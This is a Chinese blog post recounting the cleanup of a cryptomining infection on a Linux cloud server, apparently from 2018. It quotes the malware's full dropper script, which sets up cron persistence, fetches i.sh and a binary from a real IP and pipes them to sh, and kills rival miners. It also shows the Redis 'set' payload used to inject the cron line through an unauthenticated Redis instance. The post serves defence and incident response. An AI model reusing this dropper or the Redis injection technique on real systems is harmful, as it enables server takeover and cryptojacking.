服务器被攻击的发现和解决过程

最新推荐文章于 2024-05-22 15:00:00 发布
最新推荐文章于 2024-05-22 15:00:00 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 常用工具 文章标签: 服务器 运维 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20667511/article/details/122679711
版权

记一次服务器被攻击的发现和解决过程

这是之前2018年左右,买阿里云服务器之后,服务器被攻击,当时的记录信息,现在整理一下

出现的问题

服务器的用户进程一直处于100%的使用

在这里插入图片描述
通过ps -ef ,查看进程,并未发现异常(可能是自己没注意到),重启阿里云的服务器之后,正常了

通过在crontab -e ,定时任务里面查看到了异常,定时任务被写入了一段脚本命令

在这里插入图片描述
脚本里面请求的链接地址 http://149.56.106.215:8000/i.sh

脚本的内容如下:(现在接口已经失效了

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

以下为标注的截图
在这里插入图片描述

以上我已经找到问题出现的大概原因。就是在定时任务里面写入了脚本,定时执行,
那么问题来了,如何写入以及如何解决呢?

解决思路和解决过程

解决思路:

我们需要删除定时任务里面的任务(此时定时任务可能有多出,需要删除干净)
删除脚本出现的文件、目录等,防止里面还存在可能执行的脚本或者任务

解决步骤:

1.先删除/tmp目录下的两个文件
在这里插入图片描述
在这里插入图片描述

2.删除 /var/spool/cron 目录下的root文件(这也是定时任务的一个路径,类似于 crontab -e)
在这里插入图片描述

思考:为什么会出现这样的脚本

改写 /root/.ssh/authorized_keys

借鉴一篇博客写的
这一篇提到的可能会改写
/root/.ssh/authorized_keys文件

在这里插入图片描述
都应该知道,这是控制远程连接,添加密钥key的文件,那么我们服务器不就被远程控制了嘛

通过redis日志实现的

原因:
在redis的持久化到硬盘的文件中,有一个appendonly.aof,里面有记录,记录了通过操作redis,设置了key为1
在这里插入图片描述
表示
set 1 “*/1 * * * * curl -L http://149.56.106.215:8000/i.sh | sh”
redis持久化的方式有两种:aof和rdb
aof的文件,就是将你对redis的所有操作记录下来
所以下一次重启redis,数据会恢复,就只将之前的所有操作执行一遍

这就解释了,为什么定时任务里面会被写入脚本,就是安装redis的时候,默认端口6379,而且没有设置密码登录,所以别人就可以通过操作 redis,如果开启aof的持久化方式,就会注入形如上图的脚本

至此:也就解释了原因。

但是需要注意的是:

我观看定时任务执行时的日志:
/var/log/cron

但是crontab 的日志里面依然存在生成的日志在这里插入图片描述
也就是说,服务器,还有定时任务没有关闭完

重启了crond的服务之后,
之后发现在/etc/cron.d的目录下面,文件为root的,还是会定时的执行

在这里插入图片描述
可以查看文章 “getpwnam() failed” in /bin/sh only when called from cron

总结:

1:先查看cron 的日志 /var/log/cron
2:需要检查的定时任务的路劲有: crontab -e
3: 还有 /var/spool/cron 目录下的
4:以及 /etc/cron.d 目录下的
5:需要仔细看 脚本里面的内容,可能还存在其他的可疑信息
6:redis的使用一定要注意,开放端口和设置密码,防止被利用redis aof的持久化机制

可爱组长
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记录服务器攻击及问题排查
cy364328541的博客
11-03 311
centos7恶意软件排查
服务器攻击怎么办?如何防止服务器攻击
oldboyedu1的博客
12-02 2594
目前,服务器遭受攻击已经成为屡见不鲜的事情了,而且大部分企业都发生过服务器攻击的情况,从而导致业务无法正常运行,造成严重的损失和影响。4、设置防火墙,防火墙是可以在部分攻击上打到抵御的效果的,禁用一些不用的端口防止非法分子利用其端口进行攻击,同时可以通过防火墙设置把攻击重定向。2、网站业务添加CDN,预算充足的情况下可以考虑添加CDN,但是大流量的攻击可能产生高额CDN费用,需要酌情考虑。5、提升服务器配置,一般的攻击如果不是非常猛烈,可以适当提升服务器带宽,CPU和内存,保证资源不被攻击消耗殆尽。
web服务器攻击的八种方式_服务器攻击教学
最新发布
m0_61869253的博客
05-22 1016
随着互联网的高速发展,网络走进了千家万户,同时也有很大一部分人架设起了自己的网站。继而不安分的黑客们,又将目光对准了服务器攻击这个方式,从而破坏或取得服务器的管理权限。本文将主要讲述针对web服务器攻击的八种方式。这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL,从而达到服务器攻击的目的。
服务器攻击该怎么办?
weixin_50720651的博客
09-10 972
1、切断网络 对服务器所有的攻击都来源于网络,因此,当服务器遭受攻击的时候,首先就要切断网络,一方面能够迅速切断攻击源,另一方面也能保护服务器所在网络的其他主机。 2、查找攻击源 要根据自身经验和综合判断能力,通过分析系统日志或登录日志文件,找出可疑信息,分析可疑程序。 3、分析入侵原因和途径 一定要查清楚遭受攻击的具体原因和途径,有可能是系统漏洞或程序漏洞等多种原因造成的,只有找到问题根源,才能够及时修复系统。 4、备份好用户数据 当服务器遭受攻击的时候,就要立刻备份好用户数据,同时也要注意这些数据是否存
怎么看服务器是中毒了还是被攻击?以及后续处理方案
a38417的博客
01-21 828
幸运的是,现在市场上有很多专业的杀毒软件。此外,一旦发生中毒问题,管理员必须及时排查问题并解决,尽快恢复服务器的安全性,保护企业的利益。既然系统遭到入侵,那么原因是多方面的,可能是系统漏洞,也可能是程序漏洞,一定要查清楚是哪个原因导致的,并且还要查清楚遭到攻击的途径,找到攻击源,因为只有知道了遭受攻击的原因和途径,才能删除攻击源同时进行漏洞的修复。所有的攻击都来自于网络,因此,在得知系统正遭受黑客的攻击后,首先要做的就是断开服务器的网络连接,这样除了能切断攻击源之外,也能保护服务器所在网络的其他主机。
SSH下authorized_keys, id_rsa, id_rsa.pub, known_hosts作用
lxw1844912514的博客
05-09 1万+
一、known_hsotsssh会把你每个你访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。当下次访问相同计算机时,OpenSSH会核对公钥。如果...
全面防护网络攻击服务器负载及安全解决方案.docx
10-02
3. 在被攻击过程中,能准时告诫管理员,并记录和阻断骇客行为、特征。 为满足这些需求,我们提出了以下解决方案: 1. 多链路负载均衡:使用台湾众至Sharetech的解决方案,可以智能地解决多链路负载均衡问题。 2....
Linux服务器被黑解决方法.pdf
09-06
Linux服务器被黑客攻击是网络安全中的常见问题,对系统的稳定性和数据安全构成严重威胁。当发现服务器可能被黑时,必须采取一系列紧急措施以确保数据安全并尽快恢复系统正常运行。 首先,确认服务器是否被黑的一个...
对付服务器罢工的解决方案.pdf
12-02
服务器宕机与死机问题】 ...总的来说,面对服务器罢工,解决方案应涵盖预防、检测、恢复和优化等多个环节。通过加强安全策略、采用自动化工具、提升运维效率,可以显著减少服务器宕机带来的影响,保障业务连续性。
基于C#的FTP服务器和客户端源码
04-10
在本文中,我们将深入探讨如何使用C#编程语言实现一个基本完整的FTP(文件传输协议)服务器和客户端。FTP是互联网上广泛使用的标准协议,用于在两台计算机之间交换文件。C#作为.NET框架的主要开发语言,提供了丰富的...
一次Linux系统被攻击的分析过程.pdf
09-06
在本文中,我们将对 Linux 服务器攻击的分析过程进行详细的介绍,探讨服务器遭受攻击的原因、解决方法和防范措施。 Linux 服务器遭受攻击的原因可以归纳为七种:口令攻击、拒绝服务攻击、网络欺骗攻击、网络监听...
怎么知道网站是否被黑 服务器是否被入侵呢
网站安全专家
06-17 1801
很多客户网站服务器被入侵,被攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站被篡改,被跳转,首页内容被替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序,以及网站被上传webshell的安全提醒,包括腾讯云提示服务器有木马文件,客户网站被攻击的第一时间,是需要立即处理的,降损失降到最低,让网站恢复正常的访问,由于每个客户找到...
过年了,让你的服务器提高警惕!
yangactive的专栏
01-31 524
作者介绍:林伟壕 网络安全 DevOps 新司机,先后在中国电信和网易游戏从事数据网络、网络安全和游戏运维工作。对 Linux 运维、虚拟化和网络安全防护等研究颇多,目前专注于网络安全自动化检测、防御系统构建。 遇到服务器被黑,很多人会采用拔网线、封 iptables 或者关掉所有服务的方式应急,但如果是线上服务器就不能立即采用任何影响业务的手段了,需要根据服务器业务情况分类处理。 ...
解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)
墨痕诉清风的博客
05-15 7315
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安全事件。建议登录云盾-态势感知控制台查看详情和处理。于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。解决办法:1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。
服务器遭受攻击后处理过程
热门推荐
yaodunlin的博客
02-22 1万+
1、切断网路:所有攻击都来自网路,因此在得知系统正遭受攻击后,首先切断网路,保护服务器网路内的其他主机。 2、找出攻击源:通过日志分析,查出可疑信息,同时也要查看系统打开了哪些端口,运行了哪些进程。 3、分析入侵原因和途径:既然是遭到入侵,那么原因是多方面的,可能是系统漏洞,也可能是程序漏洞,一定要查清楚原因,并且查清楚攻击的途径,找到攻击源,只有找到了攻击原因和途径才能进行漏洞的删除和修复。...
服务器经常被攻击怎么办?这7个重要因素要做好!
Chihider的博客
03-13 1626
有很多人经常会遇到这样的问题,平台网站始终被恶意攻击,什么被挂马,什么被黑,每日一大早打开网站,老是会发生各式各样的难题,这确实让网站站长们烦恼。从改动服务器管理账户开始,到改动远程端口,什么对策都进行了,依然会被恶意攻击挂马。 服务器始终被恶意攻击时,要怎么做?接下来,就跟着摩杜云的脚步一起来看看吧! 1、断开网络 对服务器全部的攻击都来自网络,所以,当服务器遭到攻击的情况下,第一步就需要断开网络,不仅可以快速断开攻击源,与此同时也可以保护服务器所属网络的其它主机。 2、查寻攻击源 要依据自身经验和综合性
服务器一直被攻击怎么办?
weixin_45869730的博客
07-09 2527
有很多人问说,网站一直被攻击,什么被挂马,什么被黑,每天一早打开网站,总是会出现各种各样的问题,这着实让站长们揪心。从修改服务器管理账号开始,到修改远程端口,什么措施都做了,还是会被攻击挂马。 服务器一直被攻击时,要怎么做? 1、切断网络 对服务器所有的攻击都来源于网络,因此,当服务器遭受攻击的时候,首先就要切断网络,一方面能够迅速切断攻击源,另一方面也能保护服务器所在网络的其他主机。 2、查找攻击源 要根据自身经验和综合判断能力,通过分析系统日志或登录日志...
服务器、网站被攻击了怎么办?
livesmo的博客
06-04 4812
网络攻击一般分为3类,分别为ARP欺骗攻击、CC攻击、DDOS流量攻击。 1、ARP欺骗攻击 ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。 ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。 ARP攻击的局限性
记一次linux服务器攻击的处理经历
kapuchang的博客
02-24 8021
首先发现IO、流量异常。查找登录记录,果不其然last命令没有结果,/var/log/wtmp文件被删除。查找/var/log/secure文件中的登录记录:grep "Accept" /var/log/secure查dstat的日志文件,正是10:51分开始出现IO异常。用nethogs 、 iftop工具可以查看到本机与几个不知哪的ip端口建立了很多连接。初步处理是打开防火墙,仅打开需要用到的...
linuxlinux
10-19
很抱歉,您的问题不够明确,请提供更具体的问题。如果您想了解Linux的基本概念和特点,可以参考以下回答: Linux是一种自由和开放源代码的类UNIX操作系统,最初由芬兰的林纳斯·托瓦兹在1991年创建。Linux操作系统具有高度的可定制性和灵活性,可以在各种硬件平台上运行,并且支持多用户、多任务和多线程。Linux操作系统还具有强大的网络功能和安全性,因此被广泛应用于服务器、嵌入式系统、移动设备等领域。Linux操作系统的核心是Linux内核,它是操作系统的核心部分,负责管理硬件资源、进程调度、内存管理、文件系统等。除了内核之外,Linux操作系统还包括各种工具、库和应用程序,例如Shell、GNU工具集、X Window系统等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值